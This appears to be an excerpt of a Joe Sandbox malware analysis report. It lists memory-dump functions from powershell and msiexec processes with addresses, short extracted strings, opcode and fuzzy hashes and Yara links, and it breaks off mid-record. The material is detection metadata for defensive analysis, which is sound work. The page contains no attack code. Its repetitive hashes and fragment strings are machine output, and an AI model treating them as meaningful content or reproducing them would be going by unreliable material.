Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 4'lq$4'lq$4'lq$$lq$$lq
API String ID: 0-1004931760
Opcode ID: cd6277ff46fab6a99123c3be1dc4456c14be42a8ad4bb4ce0fe20dd5083b0a09
Instruction ID: b1a5c10a47b1127fabfbd66e561cd4c3fcef3a0ebf702d5e64590ec51e99b2f9
Opcode Fuzzy Hash: cd6277ff46fab6a99123c3be1dc4456c14be42a8ad4bb4ce0fe20dd5083b0a09
Instruction Fuzzy Hash: 80112EA174D396CFC7278AAC5D202269FB29FA7950B2A40DFC581CB2D7CB658C05C397

Function 071CEA98 Relevance: 5.5, Strings: 4, Instructions: 488COMMON

Download Yara Rule

Strings

(olq, xrefs: 071CEED1
(olq, xrefs: 071CEB8E
(olq, xrefs: 071CEEC1
(olq, xrefs: 071CEB7E

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (olq$(olq$(olq$(olq
API String ID: 0-2997052201
Opcode ID: c9905bcfdfae9833ff9c1136374305f931d09444612cfcc6e796e40b35705553
Instruction ID: 6928cdff7ab733090cec289a522e92cc2369bf1fe6ccc887cd918764213eeffa
Opcode Fuzzy Hash: c9905bcfdfae9833ff9c1136374305f931d09444612cfcc6e796e40b35705553
Instruction Fuzzy Hash: AEF125B170434ADFDB16CFA8C844BBABBA6EF91310F14846EE4058B2D1DB35D949CB61

Function 08F20E38 Relevance: 5.3, Strings: 4, Instructions: 312COMMON

Download Yara Rule

Strings

(f|l, xrefs: 08F2110C
(f|l, xrefs: 08F21102
(f|l, xrefs: 08F21064
(f|l, xrefs: 08F2106E

Memory Dump Source

Source File: 00000002.00000002.2191546104.0000000008F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8f20000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l
API String ID: 0-3183420161
Opcode ID: ca30157091096f7a61e707e6cfe7e4b41168c7d0d22f73efd0b882b6242e8c31
Instruction ID: 7890c001f0b56cfc6317383e2724673b9f0db6c69c191607d979570a2c3d11d3
Opcode Fuzzy Hash: ca30157091096f7a61e707e6cfe7e4b41168c7d0d22f73efd0b882b6242e8c31
Instruction Fuzzy Hash: 2FC18EB5E00225DFD714CFA4C550AAEBBB2FF88311F248169D815AB754DB31ED82CB92

Function 071C6040 Relevance: 5.3, Strings: 4, Instructions: 278COMMON

Download Yara Rule

Strings

84zl, xrefs: 071C6125
tPlq, xrefs: 071C6172
tPlq, xrefs: 071C617E
84zl, xrefs: 071C611B

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: 84zl$84zl$tPlq$tPlq
API String ID: 0-4290888173
Opcode ID: 80b299f6e9dcfa03a505db74d58980895ddfe0021f8b810303e79061b893becf
Instruction ID: 49ee5a3d54e997cdb726e8efdb00595d5729e8c484117988c1c526b3626d9cec
Opcode Fuzzy Hash: 80b299f6e9dcfa03a505db74d58980895ddfe0021f8b810303e79061b893becf
Instruction Fuzzy Hash: EC9136B1700206AFCB19DEA9C851B7BBBA6EFD5710F28846ED8059B2C1DB31D841C7A1

Function 071C8C48 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

(f|l, xrefs: 071C8DC7
(f|l, xrefs: 071C8D49
(f|l, xrefs: 071C8DBD
(f|l, xrefs: 071C8D3F

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: (f|l$(f|l$(f|l$(f|l
API String ID: 0-3183420161
Opcode ID: 4a5f1cf5187f8533e651aa604f6abba0e29b14ca0bec3f0b7d23b09b73ac6390
Instruction ID: da3fe6f5dd9a877a1eb3fe61acf36524f55ed358a54b3a3cf5cfa477db4616df
Opcode Fuzzy Hash: 4a5f1cf5187f8533e651aa604f6abba0e29b14ca0bec3f0b7d23b09b73ac6390
Instruction Fuzzy Hash: 5471C3B4B00206DFCB14CF98C581AAEBBB2AF95314F15C16DD804AB399DB31EC45CB92

Function 071CA0C8 Relevance: 5.1, Strings: 4, Instructions: 137COMMON

Download Yara Rule

Strings

p5lk, xrefs: 071CA13F
,S|l, xrefs: 071CA14D
,S|l, xrefs: 071CA159
xS|l, xrefs: 071CA11B

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: ,S|l$,S|l$p5lk$xS|l
API String ID: 0-1097329135
Opcode ID: 8c7e8da03410e0a5a635675559de775fa183f582bdef07c5e8a5f9d0e96f80f6
Instruction ID: 73ae58c22c0c7e9746757aae461fce77805a25fbfafb69a314ae7c96e97e00fc
Opcode Fuzzy Hash: 8c7e8da03410e0a5a635675559de775fa183f582bdef07c5e8a5f9d0e96f80f6
Instruction Fuzzy Hash: 614148F1B0431A9FC716CAA899017ABBBE29FE6310F14C06EE505DB291DB31C945C7A2

Function 071C36A0 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$lq, xrefs: 071C36B2
$lq, xrefs: 071C3708
$lq, xrefs: 071C36FC
$lq, xrefs: 071C36CE

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $lq$$lq$$lq$$lq
API String ID: 0-195311763
Opcode ID: 9ddeec21127202afc4f68c6d913e72cbd99482aab853c7fab4e59f8d3788e8f8
Instruction ID: c3d8db99b328c6a090f62e16e118d1a6c8697024537971dbcc00bea5faba224b
Opcode Fuzzy Hash: 9ddeec21127202afc4f68c6d913e72cbd99482aab853c7fab4e59f8d3788e8f8
Instruction Fuzzy Hash: F4214CF53103066BDB29D9B99842737B6969BE2710F24C42EE519CB3D1DF75C4418362

Function 071CB385 Relevance: 5.1, Strings: 4, Instructions: 78COMMON

Download Yara Rule

Strings

$lq, xrefs: 071CB3F7
$lq, xrefs: 071CB457
$lq, xrefs: 071CB413
$lq, xrefs: 071CB43B

Memory Dump Source

Source File: 00000002.00000002.2185194466.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_71c0000_powershell.jbxd

Similarity

API ID:
String ID: $lq$$lq$$lq$$lq
API String ID: 0-195311763
Opcode ID: c47b41d9b562fcb913c10ac9e47ef497f3a4686548c7693732e717c52db9d7f3
Instruction ID: e6a72160bee52cbe4f27a69b0b2bf3040d7db76c3bb4f02a780e6cca970658c8
Opcode Fuzzy Hash: c47b41d9b562fcb913c10ac9e47ef497f3a4686548c7693732e717c52db9d7f3
Instruction Fuzzy Hash: B821DEF1A0D306CFCB36CEE4D4422B6BBB5EBA1610F19806ED806CB182D734D545CBA2

Analysis Process: msiexec.exePID: 1480, Parent PID: 7472COMMON

Executed Functions

Function 02E9C148 Relevance: 2.7, Strings: 2, Instructions: 233COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9C3EF
PHlq, xrefs: 02E9C400

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 7451c93ff65f84410f55a662207fbacfb414579f9d4f1b9185e816392f4b82a3
Instruction ID: 787521d942cc43fabe6777cdcce1fc483209087f2f22f5ab2ca6af3f78473209
Opcode Fuzzy Hash: 7451c93ff65f84410f55a662207fbacfb414579f9d4f1b9185e816392f4b82a3
Instruction Fuzzy Hash: F8A1FC74E40618DFDB14DFAAD894A9DBBF2BF89304F24D0AAE409A7365DB349841CF50

Function 02E9D288 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9D4CF
PHlq, xrefs: 02E9D4E0

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 8bc4757908c36a31ae5696de0c78f1f4e9729b7dec0184675e49b8c79b9a64aa
Instruction ID: f41eecc7aa8959394d83f965a1faf766c10587fc1e64b2645574701251718755
Opcode Fuzzy Hash: 8bc4757908c36a31ae5696de0c78f1f4e9729b7dec0184675e49b8c79b9a64aa
Instruction Fuzzy Hash: F881A574E40218CFDB18DFAAD984A9DBBF2BF89304F14D06AE409AB365DB345945CF50

Function 02E95380 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E955D9
PHlq, xrefs: 02E955C8

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 755bd586036009d9cd33510eed24592aab6a9ca80cf856070aae54df06e7bd94
Instruction ID: 9f0b8df36e457702a76239eab5258c2e79fd58b0f42f4bf7942b9b349b9cb73d
Opcode Fuzzy Hash: 755bd586036009d9cd33510eed24592aab6a9ca80cf856070aae54df06e7bd94
Instruction Fuzzy Hash: 1B81C574E40218CFDB14CFAAC984A9DBBF2BF89304F54D06AE809AB365DB349941CF50

Function 02E9C748 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9C98F
PHlq, xrefs: 02E9C9A0

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 75047478702585042e9cb33c7479697733248ac2a6abdbbbc4a380126af1d14f
Instruction ID: 17f8d5cb190ddda34e79183c8c6ad6a434870216e0acbb0fdb5e264f7dc79420
Opcode Fuzzy Hash: 75047478702585042e9cb33c7479697733248ac2a6abdbbbc4a380126af1d14f
Instruction Fuzzy Hash: 9381C474E40218CFDB14DFAAD984A9DBBF2BF89304F24D06AE819AB365DB305941CF50

Function 02E9C478 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9C6D0
PHlq, xrefs: 02E9C6BF

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: ce4adeb31401603fdd72dc2b4a9c51cde060a6b69bd1f7423c7601e098570dd7
Instruction ID: aa99baf9536e7e84483e5843c1e7aac91692ff547808bd6c65eaf3c4c64a521c
Opcode Fuzzy Hash: ce4adeb31401603fdd72dc2b4a9c51cde060a6b69bd1f7423c7601e098570dd7
Instruction Fuzzy Hash: 6E81C774E40218CFDB14DFAAC984A9DBBF2BF89304F24E06AE419AB365DB345941CF50

Function 02E9CA18 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9CC70
PHlq, xrefs: 02E9CC5F

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: c8f423da767039463ceda51bf34df517e924a2965d7e31eec81289a90b2af18b
Instruction ID: 66018669ae6b1c98d79d2f3e994916456b3a7f3067aee2bcc7e69a042ab7fda4
Opcode Fuzzy Hash: c8f423da767039463ceda51bf34df517e924a2965d7e31eec81289a90b2af18b
Instruction Fuzzy Hash: 8981C574E40218CFDB14DFAAD894A9DBBF2BF88304F24D06AE419AB365DB305941CF50

Function 02E9CFB8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9D1FF
PHlq, xrefs: 02E9D210

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: ce1d821020da72f70013a2f96392827e410ca75a63e046d465e4509e7bff0a44
Instruction ID: 9212cf74fe5cfffffe380c628e04309c701e4aaa648184d163265614c665ec11
Opcode Fuzzy Hash: ce1d821020da72f70013a2f96392827e410ca75a63e046d465e4509e7bff0a44
Instruction Fuzzy Hash: 6681B374E40218CFDB14DFAAD984A9DBBF2BF89304F14D06AE409AB365DB349981CF50

Function 02E9CCE8 Relevance: 2.7, Strings: 2, Instructions: 180COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9CF2F
PHlq, xrefs: 02E9CF40

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: f348c4385562cbc8b161dd2fa73a10d8973563d27caa506aa9fde40c47b7f9ac
Instruction ID: 534ba14f369712ebbe4b89db80fdfa706feb53189efedf196b216e9aaa94cf34
Opcode Fuzzy Hash: f348c4385562cbc8b161dd2fa73a10d8973563d27caa506aa9fde40c47b7f9ac
Instruction Fuzzy Hash: 9B81C774E40218CFDB14DFAAC994A9DBBF2BF88304F24D06AE419AB365DB345981CF50

Function 02E95362 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E955D9
PHlq, xrefs: 02E955C8

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: b27c020b1b8faded839209d3300d4b716c95360d89746ae7ee772868e2cadfb4
Instruction ID: af51ce2b0ade451fd6d0efb8a6b45cdeb3a7e5bb921c20443e87dacc264d4767
Opcode Fuzzy Hash: b27c020b1b8faded839209d3300d4b716c95360d89746ae7ee772868e2cadfb4
Instruction Fuzzy Hash: EE61F574E402189FDB14CFAAD994A9DFBF2BF89300F14D06AE809AB365DB349845CF50

Function 02E9C468 Relevance: 2.7, Strings: 2, Instructions: 157COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9C6D0
PHlq, xrefs: 02E9C6BF

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: b9028ec43237992e33b939fac9e9fd43f832b2ce8414194c75355663a0f956e3
Instruction ID: 63ff8151aee10048c12f482aeec0da0c34bbd3900df6a7ef942745ca390da64c
Opcode Fuzzy Hash: b9028ec43237992e33b939fac9e9fd43f832b2ce8414194c75355663a0f956e3
Instruction Fuzzy Hash: A861D574E406089FDB14DFAAD884A9DBBF2BF89304F24E06AE419AB365DB345841CF50

Function 02E9CA08 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9CC70
PHlq, xrefs: 02E9CC5F

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 4a3ce38346b254c11bee6a8af918d7a719b6a8d8884252e8be0438b58d230fb3
Instruction ID: ac066686f10bee17e389e8a170f2a6a698ef1b80d19f6520932e261823a519a2
Opcode Fuzzy Hash: 4a3ce38346b254c11bee6a8af918d7a719b6a8d8884252e8be0438b58d230fb3
Instruction Fuzzy Hash: 9461E874E406188FDF14DFAAD994A9EBBF2BF88300F24D06AE419AB365DB345841CF50

Function 02E9D278 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9D4CF
PHlq, xrefs: 02E9D4E0

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: aa4dd254614c6438d7266d7dcd61d24dad7eab31c225ad683b2c48f01d35444a
Instruction ID: 7d584a6d7e36fdc5c15a9d2cea6943b19e3ac9eb34030aa90a82890f3550d06e
Opcode Fuzzy Hash: aa4dd254614c6438d7266d7dcd61d24dad7eab31c225ad683b2c48f01d35444a
Instruction Fuzzy Hash: E361C574E402189FDB18DFAAD984A9DBBF2BF89300F14D06AE819AB265DB345845CF50

Function 02E9CCD8 Relevance: 2.7, Strings: 2, Instructions: 152COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9CF2F
PHlq, xrefs: 02E9CF40

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 2079644ffafd2e9485fe808336acc17ea2806bd17d3a51a57ecb1326032cd9be
Instruction ID: 259bcbfc5c660fe9f525a2001ce142bf6ae8226264d450094b3a28842a54b068
Opcode Fuzzy Hash: 2079644ffafd2e9485fe808336acc17ea2806bd17d3a51a57ecb1326032cd9be
Instruction Fuzzy Hash: 6D61D574E402189FDF14DFAAC994AADBBF2BF89300F24D06AE419AB365DB345845CF50

Function 02E9CFAA Relevance: 2.7, Strings: 2, Instructions: 151COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9D1FF
PHlq, xrefs: 02E9D210

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 05e4d75d6949bd8f24b670ca77872c6c2c386a425515b882149842fc86c3e29a
Instruction ID: aab50d844326e2eb1321d0503ded21e395e7ba14440562bfe33e6693b4fdcbb7
Opcode Fuzzy Hash: 05e4d75d6949bd8f24b670ca77872c6c2c386a425515b882149842fc86c3e29a
Instruction Fuzzy Hash: BA61C574E412188FDF14DFAAD984A9EBBF2BF89300F14D06AE419AB365DB349845CF50

Function 02E9C738 Relevance: 2.6, Strings: 2, Instructions: 149COMMON

Download Yara Rule

Strings

PHlq, xrefs: 02E9C98F
PHlq, xrefs: 02E9C9A0

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: PHlq$PHlq
API String ID: 0-2378451818
Opcode ID: 8d5869b5674d15e8bb0deabe5d98d71547076a53c5fd9a7df14844727e255cee
Instruction ID: 86442eae8d61726431a7891d91f948c07a84e1dd18f0fb8781c9547e930521d8
Opcode Fuzzy Hash: 8d5869b5674d15e8bb0deabe5d98d71547076a53c5fd9a7df14844727e255cee
Instruction Fuzzy Hash: 4261E674E402188FDB14DFAAC984A9DFBF2BF89304F24D06AE419AB365DB345841CF50

Function 02E9E97A Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b5d999db93d0c13bb16b0ebf4edb0b7b95ad4d269b2527036a6526c8a547ee08
Instruction ID: 09e27aa48692226cc3cfdb80770f671463fd40970beac7a3f93d29076c986c4a
Opcode Fuzzy Hash: b5d999db93d0c13bb16b0ebf4edb0b7b95ad4d269b2527036a6526c8a547ee08
Instruction Fuzzy Hash: 4751D774E40208DFDB18DFAAD994A9DBBF2BF89300F24D42AE915AB364DB345845CF10

Function 02E9E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dca61df7c22221bd21e9870d388ea0ba9bea8ef89a46b2c51c23f9a67e29a7d1
Instruction ID: ce7b3a50b9a99afb56d2a3a04ea321b09f2be406f867234cd48ca2ed3d7cb6ab
Opcode Fuzzy Hash: dca61df7c22221bd21e9870d388ea0ba9bea8ef89a46b2c51c23f9a67e29a7d1
Instruction Fuzzy Hash: 8151B674E40208DFDB18DFAAD594A9DBBF2BF89300F24D42AE915AB364DB345845CF14

Function 02E96498 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

,pq, xrefs: 02E9656E
,pq, xrefs: 02E96578

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: ,pq$,pq
API String ID: 0-1512141597
Opcode ID: 9811fac3b08333371184e6234b446a8cbadf5dddca14498297d5a902a64d4529
Instruction ID: 63e736ff3ba82e29e30c31a1d88006e465a8af7518b28584a8c693770691c867
Opcode Fuzzy Hash: 9811fac3b08333371184e6234b446a8cbadf5dddca14498297d5a902a64d4529
Instruction Fuzzy Hash: 8D818F30A80505CFCF14CF69C484AA9BBBABF89318B15E56BD505D736ADB31EC41CB90

Function 02E95F2A Relevance: 2.7, Strings: 2, Instructions: 188COMMON

Download Yara Rule

Strings

Hpq, xrefs: 02E96023
Hpq, xrefs: 02E96056

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: Hpq$Hpq
API String ID: 0-118394521
Opcode ID: e1c9655f614f518e16c9004c48fc1362b84c0b9920c692341e0b8ed5fe8af4a1
Instruction ID: f301b1db9c7c588399d340421d21625378d22b2acb140509bb29d0981bbfb7b7
Opcode Fuzzy Hash: e1c9655f614f518e16c9004c48fc1362b84c0b9920c692341e0b8ed5fe8af4a1
Instruction Fuzzy Hash: 4761B0317442199FDF159F29C898BAE7BF6FF88314F14845AE4468B291DB75DC01CB90

Function 02E90ED3 Relevance: 1.7, Strings: 1, Instructions: 424COMMON

Download Yara Rule

Strings

LRlq, xrefs: 02E90F19

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: LRlq
API String ID: 0-1911859014
Opcode ID: 5bad6370c05aec128ad3a55a5d67723d5935790aeb479a89d35aff3fb50c70d0
Instruction ID: 6c3f6917b78426fdf782a6228ca0d338984cbfe977b197699c070e848abbedd8
Opcode Fuzzy Hash: 5bad6370c05aec128ad3a55a5d67723d5935790aeb479a89d35aff3fb50c70d0
Instruction Fuzzy Hash: F532CC74E4021ECFCB54DF68D9A8A9DBBB2FB48301F1086A5D509A7354DB746D86CF80

Function 02E9AEBA Relevance: 1.3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

Strings

(olq, xrefs: 02E9AECD

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID: (olq
API String ID: 0-3909333457
Opcode ID: 30d78d337c030318ded8890bec97dbc5df29a48a328556db16a346d889f4b2c3
Instruction ID: 406a10ea4ec94d26dcea5b6bcd2587ea4fe4faed6dc51a9f018e6d9ba4cdab70
Opcode Fuzzy Hash: 30d78d337c030318ded8890bec97dbc5df29a48a328556db16a346d889f4b2c3
Instruction Fuzzy Hash: 78113636780109DFCB00DBA9D848BADBBB6FF88215F149066E516EB2A0DB75EC14CB50

Function 02E9E007 Relevance: .7, Instructions: 652COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163a6b1ba2e3d4131896aaf615c9395160041b2366d6504fd271e1281fcf2abd
Instruction ID: e810df8174834162608787355cf619bb6318614609344b015c534e781e652a39
Opcode Fuzzy Hash: 163a6b1ba2e3d4131896aaf615c9395160041b2366d6504fd271e1281fcf2abd
Instruction Fuzzy Hash: 4312A87617160B9FE2507B28D6AC92A7B62FB5F763744AC40E05FD0541DFB83898CB22

Function 02E9E018 Relevance: .6, Instructions: 647COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97606f00dcf5158e31678ef9eb2d0d1e3e3dc441beeaa305eeb17f74c380ed3c
Instruction ID: b315771541345958dc517345826f228e03c412c53c441c18943e665dbc4ff206
Opcode Fuzzy Hash: 97606f00dcf5158e31678ef9eb2d0d1e3e3dc441beeaa305eeb17f74c380ed3c
Instruction Fuzzy Hash: BF12A83617160B9FE2507B28D6AC92A7B62FB1F763744AC40E05FD0541DFB82898CB21

Function 02E9F71F Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02426b18a077d8e2a3cd44d5f8c7a0cd5b15f988b21a911f4eb520cf1e5761af
Instruction ID: 295688cddbb3dd833593b13726242a1f9c2fe7e406c3cb681fdff592f5f1c165
Opcode Fuzzy Hash: 02426b18a077d8e2a3cd44d5f8c7a0cd5b15f988b21a911f4eb520cf1e5761af
Instruction Fuzzy Hash: 7B610174D01319DFDB15DFA5C954AADBBB2FF89300F208529E805AB3A8DB395946CF40

Function 02E960A0 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2556131000.0000000002E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_2e90000_msiexec.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f39137fc9f04cc262678fddfb487be95fec42301451ddf36af21b88ef8a0769a
Instruction ID: c81144a1c3896a473a053f27fded30eb2ecc6070110a51fa0c4c3777f92183c7
